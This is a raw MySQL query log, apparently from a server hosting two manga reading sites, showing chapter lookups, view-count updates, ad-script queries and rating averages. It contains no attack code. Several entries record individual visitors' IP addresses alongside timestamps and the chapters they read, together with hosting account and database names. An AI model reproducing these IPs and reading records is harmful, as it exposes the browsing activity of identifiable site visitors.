330649616 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649616 Quit 330649617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649617 Quit 330649618 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649618 Quit 330649619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649619 Quit 330649620 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649620 Quit 330649621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649621 Quit 330649622 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649622 Quit 330649623 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649624 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649623 Quit 330649624 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7755' and m.active = 1 330649624 Quit 330649625 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649625 Query select * FROM chapters where id = '7755' 330649626 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649625 Quit 330649626 Query select * FROM chapters where manga_id = '189' order by display_priority ASC, id desc 330649626 Quit 330649627 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649627 Query Update chapters set view=view+1 where id = '7755' 330649628 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649629 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649628 Quit 330649629 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12723' 330649627 Quit 330649629 Quit 330649630 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649631 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649631 Query select * FROM chapters where id = '12723' 330649630 Query select * FROM chapters where id = '7755' 330649632 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649630 Quit 330649632 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7755' and m.active = 1 330649631 Quit 330649632 Quit 330649633 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649633 Query select * FROM chapters where manga_id = '193' order by id desc 330649634 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649634 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('189', '7755', '54.39.203.104', 'mangaberri.com', '2026-02-26 03:29:01', '2026-02-26 03:29:01') 330649633 Quit 330649635 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649635 Query Update chapters set view=view+1 where id = '12723' 330649634 Quit 330649636 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649636 Query select * FROM chapter_images where chapter_id = '7755' 330649635 Quit 330649637 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649637 Query select * FROM chapters where id = '12723' 330649636 Quit 330649637 Quit 330649638 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649639 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649638 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '189' and m.active = 1 330649639 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12723' 330649639 Quit 330649640 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649640 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '12723', '205.164.158.33', '2026-02-26 03:29:01', '2026-02-26 03:29:01') 330649638 Quit 330649641 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649641 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='189' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330649640 Quit 330649642 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649642 Query select * FROM chapter_images where chapter_id = '12723' 330649642 Quit 330649643 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649644 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649643 Quit 330649644 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330649644 Quit 330649645 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649645 Query select * FROM chapters where manga_id = '193' order by id desc 330649645 Quit 330649646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649647 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649646 Quit 330649647 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649647 Quit 330649641 Quit 330649648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649648 Quit 330649649 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649649 Quit 330649650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649650 Quit 330649651 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649651 Quit 330649652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649652 Quit 330649653 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649653 Quit 330649654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330649654 Quit 330649655 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649655 Quit 260225 19:29:02 330649656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649656 Quit 330649657 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14082' 330649657 Quit 330649658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649658 Query select * FROM chapters where id = '14082' 330649658 Quit 330649659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649659 Query select * FROM chapters where manga_id = '202' order by id desc 330649659 Quit 330649660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649660 Query Update chapters set view=view+1 where id = '14082' 330649660 Quit 330649661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649661 Query select * FROM chapters where id = '14082' 330649662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649661 Quit 330649662 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '14082' 330649662 Quit 330649663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649663 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('202', '14082', '2a00:f41:2c66:e468:b83a:5acc:5c96:7632', 'mangacherri.com', '2026-02-26 03:29:02', '2026-02-26 03:29:02') 330649663 Quit 330649664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649664 Query select * FROM chapter_images where chapter_id = '14082' 330649664 Quit 330649665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649665 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '202' and m.active = 1 330649665 Quit 330649666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649666 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='202' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330649666 Quit 330649667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649667 Quit 330649668 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649668 Quit 330649669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649669 Quit 330649670 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649670 Quit 330649671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649672 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649671 Quit 330649672 Quit 330649673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649673 Quit 330649674 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330649674 Quit 330649675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649675 Quit 330649676 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'i-thought-she-was-a-yandere-but-apparently-shes-even-worse-colored' 330649676 Quit 330649677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649677 Query select * FROM chapters where manga_id = '52' order by id desc 330649677 Quit 330649678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649678 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '52' and m.active = 1 330649678 Quit 330649679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649679 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='52' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 260225 19:29:03 330649680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649680 Quit 330649681 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'tokidoki-bosotto-roshia-go-de-dereru-tonari-no-alya-san' 330649681 Quit 330649682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649682 Query select * FROM chapters where manga_id = '74' order by id desc 330649682 Quit 330649683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649683 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '74' and m.active = 1 330649683 Quit 330649684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649684 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='74' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330649685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649685 Quit 330649686 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330649686 Quit 330649687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649687 Query select * FROM chapters where id = '2791' 330649687 Quit 330649688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649688 Query select * FROM chapters where manga_id = '27' order by id desc 330649688 Quit 330649689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649689 Query Update chapters set view=view+1 where id = '2791' 330649689 Quit 330649690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649690 Query select * FROM chapters where id = '2791' 330649690 Quit 330649691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649691 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330649692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649691 Quit 330649692 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '2791', '104.28.197.151', 'mangacherri.com', '2026-02-26 03:29:03', '2026-02-26 03:29:03') 330649692 Quit 330649693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649693 Query select * FROM chapter_images where chapter_id = '2791' 330649693 Quit 330649694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649694 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330649694 Quit 330649695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649695 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330649679 Quit 330649696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649696 Query select * FROM comments where manga_id = '52' and parent_id is null order by created desc 330649696 Quit 330649697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649697 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '52' and m.active = 1 330649697 Quit 330649698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649698 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Romance%' OR m.genres like '%School%' OR m.genres like '%Slice of Life%') group by manga_id ORDER BY sum(view) DESC 330649699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649699 Quit 330649700 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330649700 Quit 330649701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649701 Query select * FROM chapters where id = '2791' 330649701 Quit 330649702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649702 Query select * FROM chapters where manga_id = '27' order by id desc 330649702 Quit 330649703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649703 Query Update chapters set view=view+1 where id = '2791' 330649703 Quit 330649704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649704 Query select * FROM chapters where id = '2791' 330649704 Quit 330649705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649705 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330649705 Quit 330649706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649706 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '2791', '104.28.197.151', 'mangacherri.com', '2026-02-26 03:29:03', '2026-02-26 03:29:03') 330649706 Quit 330649707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649707 Query select * FROM chapter_images where chapter_id = '2791' 330649707 Quit 330649708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649708 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330649708 Quit 330649709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649709 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330649698 Quit 330649710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649710 Quit 330649711 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330649711 Quit 330649712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330649712 Quit 330649713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649713 Query select * FROM chapters where manga_id = '52' order by created desc limit 1 330649713 Quit 330649714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649714 Query select * FROM comments where parent_id = '738' 330649714 Quit 330649715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649715 Query select * FROM comments where parent_id = '709' 330649715 Quit 330649716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330649716 Quit 330649717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330649717 Quit 330649718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330649718 Quit 330649719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330649719 Quit 330649720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330649720 Quit 330649721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330649721 Quit 330649722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330649722 Quit 330649723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330649723 Quit 330649724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330649724 Quit 330649725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330649725 Quit 330649726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330649726 Quit 330649727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330649727 Quit 330649728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330649728 Quit 330649729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330649729 Quit 330649730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330649730 Quit 330649731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330649731 Quit 330649732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330649732 Quit 330649733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330649733 Quit 330649734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330649734 Quit 330649735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330649735 Quit 330649736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330649736 Quit 330649737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330649737 Quit 330649738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330649738 Quit 330649739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330649739 Quit 330649740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330649740 Quit 330649741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330649741 Quit 330649742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330649742 Quit 330649743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330649743 Quit 330649744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330649744 Quit 330649745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330649745 Quit 330649746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330649746 Quit 330649747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330649747 Quit 330649748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330649748 Quit 330649749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330649749 Quit 330649750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330649750 Quit 330649751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330649751 Quit 330649752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330649752 Quit 330649753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330649753 Quit 330649754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330649754 Quit 330649755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330649755 Quit 330649756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330649756 Quit 330649757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330649757 Quit 330649758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330649758 Quit 330649759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330649759 Quit 330649760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330649760 Quit 330649761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330649761 Quit 330649762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330649762 Quit 330649763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330649763 Quit 330649764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330649764 Quit 330649765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330649765 Quit 330649766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330649766 Quit 330649767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330649767 Quit 330649768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330649768 Quit 330649769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330649769 Quit 330649770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330649770 Quit 330649771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330649771 Quit 330649772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330649772 